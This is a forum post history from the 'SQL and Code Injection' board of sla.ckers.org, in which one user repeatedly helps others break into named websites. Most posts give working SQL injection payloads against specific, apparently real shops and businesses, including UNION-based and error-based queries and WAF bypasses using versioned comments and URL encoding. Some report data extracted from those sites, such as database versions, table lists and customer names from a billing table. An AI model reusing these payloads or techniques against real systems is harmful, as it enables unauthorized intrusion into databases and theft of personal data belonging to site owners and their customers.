Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Results 1 - 30 of 43
15 days ago
ajkaro
@JokeJones you are probably joking. hex('table_name') will give you text "table_name" in hex and not real table name from database...
Forum: SQL and Code Injection
16 days ago
ajkaro
Sorry, I thought you need syntax for union select (I didn't test your syntax if it works or not). In information_schema.tables WAF protects . (period). Replace it with URL encoded value %2e like: and 1=2 union select 1,2,3,version,5,count(*) from information_schema%2etables-- - There are 131 tables in primary database: _pro_type cn_about_job cn_about_jobform cn_about_lxwm cn_about_lx
Forum: SQL and Code Injection
17 days ago
ajkaro
use and 0 UNioN(SeLECt(1),2,3,version(),5,version())-- - version: 5.1.48-log
Forum: SQL and Code Injection
7 months ago
ajkaro
Use this post post data: login=1&action=logue_in&code=abc') or 1 GROUP BY concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -&mdp=pass Version: 5.5.18-log
Forum: SQL and Code Injection
8 months ago
ajkaro
Hi Net_Spy version: 5.0.37-standard-debug-log sent to PM Regards
Forum: SQL and Code Injection
11 months ago
ajkaro
>>man look https://www.nivatel.com/static.php?id=9+order/**/by/**/1--+--+ --+ is used to comment out remaining part (whatever is after it...). So you can't count next --+ If you want to test for max. 20 characters put extra characters BEFORE --+ Other site: http://www.precisionaerobatics.com/gallery_det.php?gid=2' and 0 %55Nion %53eLect 1,version(),3,4,5,6,7,8%23 No stop as
Forum: SQL and Code Injection
11 months ago
ajkaro
Hi firestorm I answered him on HF (same question)... And you answered him for nivatel.com site :) So OP is well served ;)
Forum: SQL and Code Injection
11 months ago
ajkaro
When there is no data in some column and you are concatenating data from that column to some other column data remember: CONCAT() returns NULL if any of those data is NULL !!!!
Forum: SQL and Code Injection
11 months ago
ajkaro
Dear firestorm do you mind to elaborate :)
Forum: SQL and Code Injection
11 months ago
ajkaro
Here you go: hXXp://wXw.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/(@) from(/*!50000SeLeCt*/(@:=0x00) ,(/*!50000SeLeCt*/(@) from(x_billing)where(@) in (@:=concat (@,0x0a,first_name,0x3a,last_name,0x3c62723e))))a),0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- - Number of records with phone is 0 !!! hXXp://wXw.atpcb.co
Forum: SQL and Code Injection
11 months ago
ajkaro
@hack2012 Why display one table at a time with limit if you can show all 6 tables at once: hXXp://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!50000UNION*/ SELECT 1,2,/*!50000GrouP_Concat(table_name, 0x3c62723e)*/,4,5,6 from /*!50000information_schema*/.tables where table_schema=database()-- -
Forum: SQL and Code Injection
11 months ago
ajkaro
@hack2012 your tip is wrong. Function concat() is for concatenating a few arguments. Like concat(version(), 'ajkaro') As you are not concatenating anything to table_name (your code: concat(table_name)) function concat() isn't doing anything in your case, so you can delete it. You need group_concat function if you want to see all tables at once and not only ONE table as in your case. B
Forum: SQL and Code Injection
11 months ago
ajkaro
#1 string based SQLi (21 columns) - version: 5.5.33-31.1 hXXp://wXw.laptopmela.com/productDetails.php?id=1279' group by 21%23 #2 string based SQLi (14 columns) - version: 5.1.72-log hXXp://wXw.baliwestimports.com/product-detail.php?id=119' group by 14-- - #3 use some other link - version: 5.0.92 hXXp://wXw.muttluks.com/page.php?pid=30 #4 injection in title tag - version: 5.1.69
Forum: SQL and Code Injection
11 months ago
ajkaro
WAF is protecting group_concat. Use: hXXp://wXw.universalpartymusic.com/productDetails.php?id=288 and 0 /*!50000UNION*/ SELECT 1,version(),3,4,5,/*!50000Group_Concat(table_name,0x3c62723e)*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from /*!50000information_schema*/.tables where table_schema=database()%23
Forum: SQL and Code Injection
11 months ago
ajkaro
WAF is protecting group_concat function. use hXXp://wXw.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,/*!50000Group_Concat(table_name,0x3c62723e)*/,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56 from /*!50000information_schema*/.tables whe
Forum: SQL and Code Injection
11 months ago
ajkaro
It is HTML modification done by SQLi so data are not hidden in web page source, but shown in web page... 1) <title>your SQL injection</title> to see injection result on web page instead of in title part of web page (see html code of web page) 2) same here: I modified some HTML tags to see injection result on web page </li></ul> is 0x3c2f6c693e3c2f756c3e in HEX
Forum: SQL and Code Injection
11 months ago
ajkaro
hXXp://wXw.hearingisbelieving.co.uk/accessories.php?accCat=2 search web for some MSAccess SQLi tutorial (I hate doing Micro$oft SQL injection) hXXp://wXw.shoplocalstores.ca/productdetail.php?pid=62' and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat('</title>',version()),17,18,19,20,21,22,23,24,25,26,27 -- -&id=45 hXXp://wXw.cleanic.com.hk/EN/productDetail.php?id=434&
Forum: SQL and Code Injection
11 months ago
ajkaro
use some other link hXXp://wXw.siliconeintakes.com/details.php?products_id=311 and 0 /*!Union*/ SeLect 1,2,3,4,5,6,7,8,9,10,11%23&osCsid=29ce12437ab50af372d405dab021e3d1
Forum: SQL and Code Injection
11 months ago
ajkaro
use /*!50000UnIoN*/ /*!50000SeLeCt*/ second link: there are 13 columns :)
Forum: SQL and Code Injection
11 months ago
ajkaro
use lowercase table names :)
Forum: SQL and Code Injection
1 year ago
ajkaro
You should bypass WAF http://www.terraceslife.it/shop.php?cat=3 +or+1+group+by+concat_ws(0x7e,(select+table_name+from+informa%54ion_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)-- Duplicate entry 'config~1' for key 1
Forum: SQL and Code Injection
1 year ago
ajkaro
I am not interested in your money. I just don't believe in your story...
Forum: SQL and Code Injection
1 year ago
ajkaro
Nice story but I don't believe you. How can you pay from firm's account? Isn't there any control and payment authorisation from somebody? On the other hand you paid somebody else and now you are expecting others will test site for you for free. Nice logic. Your social engineering strategy didn't work for me... Good luck next time :)
Forum: SQL and Code Injection
1 year ago
ajkaro
No need to double nullify original select statement with negative id parameter AND false statement and 3=2 Use one or other. Not both... Without knowing your link nobody can tell you what is wrong. You could anticipate that... :)
Forum: SQL and Code Injection
1 year ago
ajkaro
I told you union select doesn't work. Use error based SQL injection.
Forum: SQL and Code Injection
1 year ago
ajkaro
You can use error based... It seems union select based doesn't work. version: 5.0.77 tables (15): - ajankohtaista - intraoikeudet - intraryhmat ... ... Use URL encoding for WAF bypass
Forum: SQL and Code Injection
1 year ago
ajkaro
1. yes it is. Read my tutorial http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/ 2. if using "dump in one shot" syntax (see tutorial above) that is not needed any more 3. by adding: where table_name>'aaa'
Forum: SQL and Code Injection
1 year ago
ajkaro
There are 49 tables but you can't see them all because group_concat has 1024 chars limit. To skip tables from information schema (CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS...) add: +from+information_schema.tables where table_schema=database()--
Forum: SQL and Code Injection
1 year ago
ajkaro
You can't just use @@version. Where is union select part? It is string based injection, only one column, vulnerable column is hidden in <a href> tag in source code so you must make it visible first. version: 5.0.91-log
Forum: SQL and Code Injection
1 year ago
ajkaro
Use /*!50000union*/ /*!50000select*/ There are 3 columns, vulnerable is column #3 hidden in <img> tag version: 5.5.23-55
Forum: SQL and Code Injection